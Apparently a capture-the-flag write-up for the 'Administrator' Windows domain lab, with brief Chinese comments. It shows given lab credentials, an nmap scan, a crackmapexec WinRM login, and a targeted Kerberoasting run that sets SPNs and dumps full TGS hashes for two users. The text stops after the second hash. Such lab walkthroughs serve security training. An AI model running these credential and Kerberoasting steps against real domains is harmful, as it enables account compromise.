Machine Information As is common in real life Windows pentests, you will start the Administrator box with credentials for the following account: Username: Olivia Password: ichliebedich
# Nmap 7.95 scan initiated Wed Jan 15 19:05:28 2025 as: nmap -e utun4 -sC -sV -vv -oA nmap/default 10.10.11.42 Nmap scan report for 10.10.11.42 Host is up, received echo-reply ttl 127 (0.11s latency). Scanned at 2025-01-15 19:05:44 CST for 193s Not shown: 986 closed tcp ports (reset) PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack ttl 127 Microsoft ftpd | ftp-syst: |_ SYST: Windows_NT 53/tcp open domain syn-ack ttl 127 Simple DNS Plus 88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-01-15 17:50:12Z) 135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn 389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? syn-ack ttl 127 464/tcp open kpasswd5? syn-ack ttl 127 593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped syn-ack ttl 127 3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped syn-ack ttl 127 4444/tcp open krb524? syn-ack ttl 127 5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results: | smb2-time: | date: 2025-01-15T17:52:57 |_ start_date: N/A |_clock-skew: 6h44m17s | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required | p2p-conficker: | Checking for Conficker.C or higher... | Check 1 (port 35406/tcp): CLEAN (Couldn't connect) | Check 2 (port 46836/tcp): CLEAN (Couldn't connect) | Check 3 (port 52617/udp): CLEAN (Timeout) | Check 4 (port 45074/udp): CLEAN (Failed to receive data) |_ 0/4 checks are positive: Host is CLEAN or ports are blocked
Read data files from: /opt/homebrew/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Jan 15 19:08:57 2025 -- 1 IP address (1 host up) scanned in 208.89 seconds
crackmapexec
1 2 3 4 5 6
$ crackmapexec winrm administrator.htb -u Olivia -p ichliebedich SMB administrator.htb 5985 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb) HTTP administrator.htb 5985 DC [*] http://administrator.htb:5985/wsman /usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0. arc4 = algorithms.ARC4(self._key) WINRM administrator.htb 5985 DC [+] administrator.htb\Olivia:ichliebedich (Pwn3d!)
一上来就有 shell ?
winrm2
但确实是入口账户,看起来还需要进入其他普通用户才能获得 user flag
targetedKerberoast
1 2 3 4 5 6 7 8 9
$ python3 targetedKerberoast.py -v -d 'administrator.htb' -u 'Olivia' -p 'ichliebedich' [*] Starting kerberoast attacks [*] Fetching usernames from Active Directory with LDAP [VERBOSE] SPN added successfully for (michael) [+] Printing hash for (michael) $krb5tgs$23$*michael$ADMINISTRATOR.HTB$administrator.htb/michael*$a8bf671eddb8ecd101092866fe796ffe$3cab0455b6bce22b7236a40188d0bb106c28d01736668276ae2ed966d313c5d79ec48fd72bc495e0bf13b7e7e8eef87838157908a5e51aa4bb4add8e2b8119d5c50cbfcde86e1a9824582ca6a2056e5e8272ce15721804ba538a761ae57fe1053de42a2ac21ac98ad899f3a276a1c8b6f0ee07418ea2963883bc16574659212726e3030fa4f79fb4f4a17a55b71f1eff50a0fb790e5f81a523a6cd23924d1c0e0dc455c24659f5a59344e7e2b1a376b0bf157f42f52ebfc0d9fcfaf98b5f785c8ce78a2f8c4e3b68f0ea6802f77f1c9f7942520b862befb829286efd0a59d3ae03ba0982452da583ff27d1a4fa088b4de10d5a68de8622dde7eba5319b76e0617337c292c184945c67911387812e62ea2f94996ab82869a66b87d004f66c824ec1dd08cbe8d1198e03e0537a01f05ffcd726f6d08503b832bbbab6052edfd421657749ae4eeddc5496ba84d35fe64edf6154b08a3061836111d57e06e7bdfa38cad3e3d0e27e168b6103dc358b8901a9fe3a216a16dd486363767695eac8a1022bce72768b7a1fc2ebccb1b53f7a06394b4dc63a8d0f78534c38eea827bd4f7bd2d4052feda16dc7e0974869f6ce619adab2ce79abedf61f74cc86501bc58a660b9c372bb2e597069559bcfbc5fe8c5657fdf38ce7d685c7fb17133460ca8d525d46fefe8bddcd60cab66a01534893bf7e4cceb6953a2995fbebf6cedb845f85ceac1eae55f0a8463a2752ebf13eb85f9c1ff13edbc8c26833291609cd10d39261478f77cb386827d5b6359ca19e57255fe5f4781c3b8c54b6c62c9f6403298a5a8f391107db59976925d818a581477cbf2197025f3d05f7459d7dea2460eb7aca004362f9775a9983639baef7ac352186328e56ca1abff7ab34181b0ba82c70adb7415d2b0d8ffd74f49ff57e0295b909d182ea6ca44b8557815ea9c5d3116cac6117cbe555cfd74a6ae19aa13fb106b61b907cc9709e41e6fd36f767c88a6594c8b0370488b27a843a08b6749d183403a707887c33ec78fd10b908ad6e929ec8354a3c7b721bd96fe8d633f0d00afbb8eb0f50563573b1758bd6e87ba4ddbcf8a18db1ddae370b8830b2da2c2d5e24c499ed3852aa4ca93ae9e148c4a3643bd57b1cbf5bd229b82ca6928f893c32ffd985d577f031fbc2972733711a255075f22580e7040036f6a5bfa3f39277d44fc26aa2c419f902c9a75ea1f4b6539cc0c9bffeea8db51f4a11aa410847fa6ea2bb28741eb9538bfef62b61006e7ae57e2c0ec8df9b58a79ba118e4fe66c2c95adc809744783ea2de8f120c75b6796ac5317060ac7fc5e2f571fde498a6b39f2fd49c2d1f7eb52f1801a6783f798c011372a6d4bf0f26578bc009e8455569a9187b55747a9f35746e588a86340f4fe125b5a6c29bda34c8c28a083ae9c489cdc41320731b3cc8c6384a77865f1a372b2c1659b109dede12f8ce42489b0c0c3ebdc32a22ac951192db77b0bc2a0a4ca7240b767bd8c19911dc4018d2d69733426d74aee657a23d8d7c [VERBOSE] SPN removed successfully for (michael) [+] Printing hash for (ethan) $krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$64e00f052e9895dedd10b92c02857d3b$61473b8cfee7bb0ccc99d2c42b0af5528d31b2345401a270b2cba2aab686295cc0a9eee6b41bf41bed8bd7f90549a9b1a8ea1de8d374c1c3e16ee7af855b0301c3378bfc2885300c8c30b37522d475679b726e735e4b589d608b8d46d697a39e563c33ba5aeb522024f5631ae845fc7351d7aef34ef5ceff38fa9b023f2f9a8e580dc53c75a8402597c66c9379b68bf4a28fcc19b5b5567c06070cbd73ff447fd63cc9195ba42b09d516ec622f0e2db6821e8856fea9022a6dffe6bef62fae34c98767a6bcbc82bc4b029cdb0f72615cd5af839cf4a894c2cd79d04c1cef715059a45779b94bdde3dbf7361514a508f5e3c234494a76da551b9473e5b6bd5480e8296f568cbad74373d24b14b18a28b6e77ade2e1709161b1c834ce094edba4d5ab8201f871e1f482b6b57149a8c13ab134103d1747e89d94e021bcb1ea4d9b819b8e37cba291cf48954fec71065d9e7bd0385aac4334540d13168846fa94a87c0375a024ea098979e7270f5379b664caf5ee1df18957e0802fcc6cb9eab59f4ace7527e56c82cbef5089ef8bd873b4b984ceb62d512e506cd536cb356134b3a88049ab0b4b06b9d4dc724db83e494076a6802fe52750fa6de613e9931f7342cf540e460fa0425dff63edc3932ae0a1ae1fe73a852846d45472f9f5c5e9f20cef996c5fc9c73b8dd2144a0c20b1dd08a92ad49a209ec0ddc49523c15ec53bea12088a40cfff5bfd9d9f65e24ad193e552fd9977821ad0016b5ee8c3979bfd7c8f725e2352a07b0a875705b42503f66bb1301f217582d915f422aad572aeb17c9fb0f4aa338c0080afe606ec879031a23482aedf8cfe3492c182c668a73dc5cb9af229494eb9a0965a7c9f878f5ce103f761953e3076fe330430f1b4a6b3f70abbac4f5fc234033cd8684ef6acba0e2fa5e81092589ee5be15a456e276a221ec15edd729a8ec82d5d2de9f62bc29f0162d50206a77ecdf4ed329524a1268e974890ef5e3c8a737245b6ac8c7bb8128592263be9aa27704f9d1197e9955fa37b5c84f1d2c70426358924558d57d9db839e205ce28a969e5490305ca1b24a58ba78c8761e1d1116534540763d8d6a0e909edc43356697101d90e8f48e513b288574ee592c86a5261e85321bd31b57dbeea1a4221eec0429a957554f590a828a8f2706bfe41b551e058f7dba44f32fe8176787187963c83aa6ceac39002f53b739be2468a7314fda0d6a9c12d59530c2b46917a4f4c3b2a34b05aebdbaebd65027c241ffcdbd56649419f4a7987827b1c090296a27512562abda6e42e90a6a8f9844e72f4604dfde869eb5c389384171ba84f4ff033ce2d592de6487e556ac2eef7dec89efb0c226ec9811526338024e644b451b7a957031c996b43f92d7ee2ec510a90f12f18a4d3c270ef9a37c88710af17e8e823f4c3843e8eaeae02bf3301def2a7cd5de702fe6f42a1dbbde877a237bafd8081682bd7ae5361df724a571936dadff3aba5525b0f1cd971e61b8b1b21a5100c9a93122cc59